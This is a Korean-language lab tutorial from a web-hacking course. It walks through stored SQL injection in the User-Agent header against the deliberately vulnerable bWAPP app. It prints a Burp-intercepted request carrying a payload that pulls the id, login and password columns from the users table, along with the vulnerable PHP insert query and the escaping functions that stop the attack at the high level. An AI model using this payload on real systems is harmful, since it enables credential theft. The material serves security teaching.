정보보안(구버전)/ bWAPP 2019. 2. 7. 13:03

웹 해킹 bWAPP - 22. A1 - Injection - SQL Injection - Stored(User-Agent)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

1. Injection

 

 - OWASP Top10 A1 - 악의적인 명령 삽입
 - 서버로 전송되는 요청 정보에 악의적인 명령을 삽입하여 불필요한 동작을 실시하거나, 서버/시스템/DB 중요 정보를

   획득할 수 있는 취약점이다.
 - Ex) HTML 인젝션, SQL 인젝션, PHP 인젝션, XML 인젝션

 

 

 

2. User-Agent

 

 - HTTP 요청시 헤더에 포함되는 클라이언트 OS 버전 및 아키텍처, 웹 브라우저 정보이다. 

 

 

22-0. HTTP 요청.pcap

User-Agent 정보 확인

 

 

 

3. Injection - SQL Injection - Stored(User-Agent)

 

 - 이 시나리오는 User-Agent 정보에 SQL 인젝션하는 내용이다.

 

 

Ex1) Injection - SQL Injection - Stored(User-Agent) 이해

 

 

보안 레벨 선택 및 시나리오 선택

 

 

User-Agent 출력 내용 확인

 

 


Intercept -> 'Intercept is on' 으로 변경 실시

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

버브슈트 Intercept 내용 확인

 

 

 

 POST 방식 및 User-Agent 내용 변경 

POST /bWAPP/reset.php HTTP/1.1  <- 기존 내용

 

GET /bWAPP/reset.php HTTP/1.1  <- 변경 실시

 

Host: 192.168.20.205

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  <- 기존 내용

 

User-Agent: cisco',(select concat(id,login,password) from users limit 0,1)) #  <- 변경 실시

 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.205/bWAPP/reset.php

Cookie: security_level=0; SESS01fbf41a4a91ba48468201e701a5982f=WxQb9EwOc5K5m9Y38VljdJ4bnQwfmnwLhw6nbDQk-b8; PHPSESSID=8257ac4dcff8b1f4ead0bfb729d37d27; has_js=1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 22

 

bug=25&form_bug=submit

 

 

 

 

 

22-0. SQL 인젝션 추가-1.txt

POST 방식 및 User-Agent 내용 변경 

 

 

 

Intercept is on 클릭하여 off 실시 

 

 

 

 'Intercept is off' 확인

 

 

 

SQL 인젝션 결과 확인

 

 

[참고] cisco',(select concat(id,login,password) from users limit 0,1)) #

 

 - #는 주석 처리기 때문에 bee 내용 이후는 처리되지 않는다.

 

 - 소스  : $sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";

 

 - cisco',(select concat(id,login,password) from users limit 0,1)) # 인젝션 실시

 

 - 결과 : $sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), 'cisco',(select concat(id,login,password) from users limit 0,1)) #', '" . $ip_address . "')";

 

 - 그렇기 때문에 'cisco'는 User-Agent 쪽에 출력되고 id,login,password는 IP Address 쪽에 출력된다.


 

 

 

Ex2) 'sqli_17.php' & 'functions_external.php' 파일 내용 확인

 

bee@bee-box:/var/www/bWAPP$ ls -l sqli_17.php
-rw-rw-r-- 1 root www-data 6982 2014-11-02 23:52 sqli_17.php

bee@bee-box:/var/www/bWAPP$ vi sqli_17.php

~ 중간 생략 ~

 

include("functions_external.php");
include("connect_i.php");

 

function sqli($data)
{

    include("connect_i.php");

 

    switch($_COOKIE["security_level"])

    {

        case "0" :

 

            $data = no_check($data);
            break;

 

        case "1" :

 

            $data = sqli_check_1($data);
            break;

 

        case "2" :

 

            $data = sqli_check_3($link, $data);
            break;

 

        default :

 

            $data = no_check($data);
            break;

    }

    return $data;

}

~ 중간 생략 ~

 

$ip_address = $_SERVER["REMOTE_ADDR"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];

         //ip 주소와 user agent 값을 변수로 받아 SQL문으로 데이터베이스로 전달함

  

// Writes the entry into the database
$sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";

 

:q! 

 

 

bee@bee-box:/var/www/bWAPP$ gedit functions_external.php

~ 중간 생략 ~

 

function sqli_check_1($data)

{

  

    return addslashes($data);

            // 작은따옴표를 문자열로 이스케이프 실시

}

 

function sqli_check_2($data)

{

  

    return mysql_real_escape_string($data);

            // SQL 인젝션에서 사용하는 특수문자에 백슬래시를 붙여 입력값을 이스케이프 실시

               (NULL, \n, \r, \, ', ", ^Z)

}

 

function sqli_check_3($link, $data)

{

  

    return mysqli_real_escape_string($link, $data);

   

}

 

function sqli_check_4($data)

{

 

    // Not bulletproof

   

    // Replaces a single quote (')

    $input = str_replace("'", "''", $data);

  

    return $input;

   



 

 

Ex3) 보안 레벨 'High' 변경

 

 

Intercept -> 'Intercept is on' 으로 변경 실시

 

 

보안 레벨 및 시나리오 선택


 

 

버브슈트 Intercept 내용 확인

 

 

 

POST 방식 및 User-Agent 내용 변경 

POST /bWAPP/reset.php HTTP/1.1  <- 기존 내용

 

GET /bWAPP/reset.php HTTP/1.1  <- 변경 실시

 

Host: 192.168.20.205

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  <- 기존 내용

 

User-Agent: cisco',(select concat(id,login,password) from users limit 1,1)) #  <- 변경 실시

 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.205/bWAPP/sqli_17.php

Cookie: security_level=2; SESS01fbf41a4a91ba48468201e701a5982f=WxQb9EwOc5K5m9Y38VljdJ4bnQwfmnwLhw6nbDQk-b8; PHPSESSID=8257ac4dcff8b1f4ead0bfb729d37d27; has_js=1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 22

 

bug=25&form_bug=submit

 

 

 

22-1. SQL 인젝션 추가-2.txt

POST 방식 및 User-Agent 내용 변경 

 

 

 

Intercept is on 클릭하여 off 실시 

 

 

 

 'Intercept is off' 확인

 

 

 

SQL 인젝션 실패

 

 

 

'Reset' 실시

 

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


웹해킹 22. bWAPP Injection - SQL Injection - Stored(User-Agent)   https://youtu.be/xoOFKqqjHcI

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q